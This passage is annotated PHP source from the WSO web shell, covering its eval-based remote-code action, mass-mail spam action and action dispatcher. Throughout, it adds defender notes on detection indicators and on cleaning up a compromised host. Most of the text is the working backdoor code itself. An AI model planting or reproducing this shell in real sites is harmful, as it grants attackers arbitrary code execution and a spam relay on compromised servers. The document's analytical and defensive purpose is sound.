 * eval() in every case, so the requester runs arbitrary PHP as the web
 * server user. Nothing inside this function authenticates the caller;
 * whatever gate exists is applied by the file-level setup, which also
 * base64-decodes $_POST before any action runs.
 *
 * Defender notes: a serialized array containing the literal 'wso_version'
 * key is a reliable response-body indicator for this family, and a POST
 * whose decoded parameters include p4 is the request-side one. Treat the
 * host as fully compromised: remove the file and rotate every credential
 * reachable from it.
 */
function actionRC() {
    if (!isset($_POST['p4'])) {
        // Fingerprint-only branch; note there is no early return, so the
        // eval() below still executes (with nothing useful when p4 is absent).
        $a = array('uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => '3', 'safemode' => @ini_get('safe_mode'));
        echo serialize($a);
    }
    // Direct execution of request-supplied PHP source.
    eval($_POST['p4']);
}
/*
 * Mass-mail action: sends one message per line of the `emaillist`
 * textarea, optionally with a base64-encoded attachment taken from the
 * uploaded `file`. Every header value (from, realname, replyto, subject,
 * contenttype) is taken from $_POST unvalidated and interpolated straight
 * into the header string passed to mail(), so the server's mail path is
 * entirely under the requester's control.
 *
 * The message text is not passed as mail()'s body argument (that is the
 * empty string); it is appended to the additional-headers argument after a
 * blank line, which is how it reaches the MTA.
 *
 * Defender notes: a web-tier host that suddenly performs many mail() calls
 * is the most visible symptom. With mail.log and mail.add_x_header enabled
 * in php.ini, every message records the originating script path, which
 * points directly at this file. The 'Mass Mailer' heading and the
 * 'Sending Complete' alert are response-body indicators. split() was
 * removed in PHP 7.0, so on a current interpreter this action fails at the
 * recipient split before any message is sent.
 */
function actionMailer() {
    wsoHeader();
    if (isset($_POST['emaillist'])) {
        // Raw form input; nothing below is validated or escaped.
        $emaillist = $_POST['emaillist'];
        $from = $_POST['from'];
        $replyto = $_POST['replyto'];
        $subject = stripslashes($_POST['subject']);
        $realname = $_POST['realname'];
        $file_name = $_FILES['file']['name'];
        $file = $_FILES['file']['tmp_name'];
        $file_type = $_FILES['file']['type'];
        $contenttype = $_POST['contenttype'];
        // Round-trips the message through urlencode to turn escaped quotes
        // (%5C%22) back into plain quotes before stripping slashes.
        $message = stripslashes(urldecode(str_replace('%5C%22', '%22', urlencode($_POST['message']))));
    }
    // Re-displays the submitted values inside the form without escaping;
    // the onsubmit handler mg() is defined elsewhere in the file.
    echo "<h1>Mass Mailer</h1><div class=content>
<form name='mailform' method='post' onsubmit='mg(this);return false;' enctype='multipart/form-data'><table width='100%' border='0'><input type='hidden' name='a' value='Mailer'><tr><td width='10%' align='right'>From Email:</td><td width='18%'><input type='text' name='from' value='$from'></td><td width='31%' align='right'>From Name:</td><td width='41%'><input type='text' name='realname' value='$realname'></td></tr><tr><td width='10%' align='right'>Reply:</td><td width='18%'><input type='text' name='replyto' value='$replyto'></td><td width='31%' align='right'>Attach File:</td><td width='41%'><input type='file' name='file' size='30'></td></tr><tr><td width='10%' align='right'>Subject:</td><td colspan='3'><input type='text' name='subject' value='$subject' size='66'></td></tr><tr><td width='10%' valign='top' align='right'>Message:</td><td width='18%' valign='top'><textarea name='message' cols='50' rows='10'>$message</textarea><input name='contenttype' type='radio' value='plain'>Text<input name='contenttype' type='radio' value='html' checked>HTML<input type='submit' value='Send Emails'></td><td width='31%' valign='top' align='right'>Mail to:</td><td width='41%' valign='top'><textarea name='emaillist' cols='30' rows='10'>$emaillist</textarea></td></tr></table></form></div>";
    if ($emaillist) {
        // Because of the && chain this only aborts when from, subject and
        // message are ALL empty; any one of them being set lets sending proceed.
        if (!$from && !$subject && !$message) die('Please complete all fields before sending your message.');
        // One recipient per line (split() is unavailable on PHP >= 7.0).
        $allemails = split("
", $emaillist);
        $numemails = count($allemails);
        if ($file_name) {
            if (!file_exists($file)) die('The file you are trying to upload could not be copied to the server');
            // Reads the whole upload into a base64 MIME part; the handle from
            // fopen() is never closed.
            $content = chunk_split(base64_encode(fread(fopen($file, 'r'), filesize($file))));
            // MIME boundary for the multipart message.
            $uid = strtoupper(md5(uniqid(time())));
        }
        for ($x = 0;$x < $numemails;$x++) {
            $to = $allemails[$x];
            if ($to) {
                $to = str_replace(' ', '', $to);
                // Progress output is flushed per recipient so the page streams.
                print " $to.......";
                flush();
                // Headers are assembled from unvalidated request values.
                $header = "From: $realname <$from>
Reply-To: $replyto
MIME-Version: 1.0
";
                if ($file_name) $header.= "Content-Type: multipart/mixed;boundary=$uid
--$uid
";
                // The blank line followed by $message turns the rest of the
                // header string into the message body.
                $header.= "Content-Type: text/$contenttype
Content-Transfer-Encoding: 8bit

$message
";
                if ($file_name) $header.= "--$uid
Content-Type: $file_type;name=\"$file_name\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=\"$file_name\"

$content
--$uid--";
                // Empty body argument; everything travels in $header.
                mail($to, $subject, "", $header);
                flush();
            }
        }
    }
    if (isset($_POST['emaillist']) && $numemails !== 0) {
        echo "<script>alert('Sending Complete
Total Email $numemails');</script>";
    }
    wsoFooter();
}
/* Choosing the page */
// Action dispatch: the POST parameter `a` names the action, defaulting to
// 'FilesMan'; any function in this file named action<a> is reachable via
// call_user_func(). Since the file-level setup base64-decodes $_POST, the
// on-the-wire value of `a` is the base64 form of the action name, which
// makes a decoded `a` parameter a useful request-side indicator for this
// family. Execution always ends here; nothing after the exit runs.
if (empty($_POST['a'])) $_POST['a'] = 'FilesMan';
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
exit;